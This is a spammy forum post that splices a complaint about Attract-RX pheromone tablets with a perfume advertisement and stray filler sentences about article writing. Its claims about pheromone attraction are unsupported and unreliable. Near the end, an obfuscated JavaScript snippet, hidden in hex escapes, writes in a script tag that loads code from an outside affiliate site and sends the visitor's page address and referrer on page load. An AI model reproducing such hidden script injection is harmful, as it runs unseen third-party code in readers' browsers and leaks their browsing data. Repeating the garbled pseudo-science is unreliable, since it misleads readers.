Pheromone Perfume Singapore: Attract-RX Pheromone SCAM

View previous topic View next topic Go down

Pheromone Perfume Singapore: Attract-RX Pheromone SCAM

Post by Admin on Tue Sep 20, 2016 9:24 pm

Pheromone Perfume Singapore and Attract-RX Pheromone SCAM

Atract-RX pheromones have received a lot of attention for their claims of elevating your bodies natural pheromone levels. This sounds interesting, however raises a few questions.. Evil or Very Mad

• You bought a good multi vitamin with zinc, DHEA and Tribulus you would spend the quarter of that price and have the same thing.
  • If you look all the way to the bottom of there website it says they are not FDA approved .. hmmm ...
  • I wonder why.

Tried to stay optimistic that the pheromones would kick in and women would notice me but nothing really happened.I'm guessing your results will depend on how your body reacts assuming their is in fact, any real phermones in the tablets. I've tried many pheromones before but this one is definetely subpar when it comes to results. Some users have claimed that it works so it may have been just my experience and how my body reacted .. but if thats the case I would want a product that works well for everybody. Embarassed

• Ultimately decided to order one bottle to see if it actually worked.
  • I took the 3 tablets every night before I went to bed waiting to see if any results would transpire. Surprised

Psuedo Science of Pheromone Fact?

According to the merchant, Attract RX contains a unique blend of potent herbs to increase pheromone production. This includes L-Arginine HCI, L-Glutamine, L-Isoleucine, L-Leucine, L-Lysine, L-Omithine HCL, L-Valine, and Colostrum. The product is basically being promoted as a pheromone supplement.From what I can see, this is nothing more than a bunch of amino acids.

Powerful agents to attract the opposite sex or to enhance your love life can be created when special scents are combined with high quality pheromones. Pheromones are natural chemicals that animals, including human beings, naturally release to attract the opposite sex. Pheromones cannot consciously be identified, but can register a response through the vomeronasal organ (VNO), which resides in the nasal passage. Certain scents, for example vanilla, can sometimes promote thoughts of sex. The combination of the right scents and pheromones can be a more powerful sexual attractant than either the scent or pheromone alone.

Amazingly These Agents are Easy to Use Because You Simply Wear Them on Your Skin

Users of a pheromone icebreaker smells like a day at the beach, are directed to wear some on their forehead, bridge of the nose, and neck. This helps the sexual attractant to radiate in the area in front of the wearer so that they may become the recipient or focus of sexual interest. We take pride in saying that this article on Pheromones is like a jewel of our articles. This article has been accepted by the general public as a most informative article on Pheromones.

Unscented Sex Pheromones 4 Gay Men Man Cologne Additive | Ebay

Fragrances made of many scents have to be chosen carefully and kept in the correct ratios with pheromones to create a sexual attractant. It can be painstaking to get the right combination, but when you get it right, the results can be outstanding. We have omitted irrelevant information from this composition on Pheromones as we though that unnecessary information may make the reader bored of reading the composition.

Our experience with one fragrance or sexual attractant made up of 17 different scents has this property. To be consistent the agent must have high quality scents to be a consistent sexual attractant. The scents have to be chosen carefully and kept in the correct ratios. The results over a period of time have been outstanding. The idea is that not one scent can be identified. In fact knock off perfumers have tried to duplicate this product without success because of its complicated makeup. In addition the multi scented fragrance has powerful pheromone products for men making it more powerful than just pure pheromones alone. Having been given the assignment of writing an interesting presentation on Pheromones, this is what we came up with. Just hope you find it interesting too! Idea

Mass marketed fragrances are designed to appeal to the wearer but are not good sexual attractants. Believe it or not, sometimes certain food scents can draw a reaction. In the end, a wearer who is willing to wear a scent that is unconventional may be the wisest or luckiest individual to receive interest from the opposite sex. It is not necessary that only the learned can write about Pheromones. As long as one ahs a flair for writing, and an interest for gaining information on Pheromones, anyone can write about it.

Here is One Test to Determine If a Fragrance Has Sexual Attractant Properties

Place a small amount of the fragrance on your wrist and smell it. Then extend your hand completely away from your nose. Then bring it back to your nose and smell it again. Do this several times. If the aroma smells different but at the same time is pleasant you may have a powerful sexual attractant.

• Recently an associate was wearing a sexual attractant composed of a combination of multiple scents and powerful pheromones in a grocery store.
  • He noticed that an attractive woman was following him from aisle to aisle.
  • Later he went to the register and turned to see that the woman was in line with him.
  • He also noticed that she did not have anything to buy.
  • The lady looked at him and told him that she forgot to pick up items to buy.
  • Inspiration can be considered to be one of the key ingredients to writing.
  • Only if one is inspired, can one get to writing on any subject especially like Pheromones. Very Happy
  • WHERE ARE MY PERSONAL PHEROMONES LOCATED?
  • In the Nose of whoever you come in contact with!
  • At least they should be.
  • There it is SEX and SCENT!
  • In that Sexy Part of the Body called the NOSE!
  • Are you repelled by a person for no reason.
  • It may be that their Pheromones just don't mix with yours.
  • You not only smell the sexuality of another person, you sence a Pheromone Attraction coming from their Skin, Body and Mind. Rolling Eyes

And so NAUGHTY NIGHTS "Don't go to Bed Without it" TM c2003-2005 Alex Max New York LLC was created. So it's more than true that some perfumes can actually start the process of sexual attraction. There are certain subtle fragrances if used in a proper combination that can make you attractive to the Opposite Sex or Even Your Own if you are so inclined. It would be hopeless trying to get people who are not interested in knowing more about Pheromones to read articles pertaining to it. Only people interested in Pheromones will enjoy this article.

When I First Created NAUGHTY NIGHTS PARFUM, I Was Dripping in Female Pheromones

The Attraction was incredible. I get my share of "Hello, how are you?" But this was truly an interesting Experience. Guys at the Gym, Cabbies, Executives on the Elevator and so on... They all had a Very Special Smile on their faces. I had to move fast...I had forgotten the Female Pheromones. When I returned to my office, a few Lawyers in the Building wanted to linger and talk. What is going on? Lawyers never have time to talk! And when I'm at my office, neither do I. But when I entered the room I realized...oooohhh Lalala...it's those Female Pheromones. Wink

Your scent when mixed with the right perfume ingredients can be dynamite in the bedroom and cause an incredible attraction wherever you go. Why... Because Scent Really does log onto Memory. Remember your Mom's special Scent? It might have been a perfume or her style of cooking. When you remember does it bring a smile to your face. Well, when he or she remembers your special scent, guess what happens? I gave out samples of Naughty Nights Parfum to my friends, and the reports were Incredible. To read more about Naughty Nights and Sweet Smell of Sexsuccess, Log on to www.alexmax.com and click on Pheromones. A lot of imagination is required in writing. People may think that primal instinct pheromone oil very easy; on the contrary, knowledge and imagination has to be merged to create an interesting composition.

About the Author: Parfumeur Alex Max of Alex Max New York LLC and Alex Max Beverly Hills

Creating Custom Parfum for Ellegant People, Pets and Companies with Custom Labels. This article has been written with the intention of showing some illumination to the meaning of Pheromones. This is so that those who don't know much about Pheromones can learn more about it.

var c2="pheromones";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

View user profile http://jennyrandolph.forummotions.com

Back to top Go down

View previous topic View next topic Back to top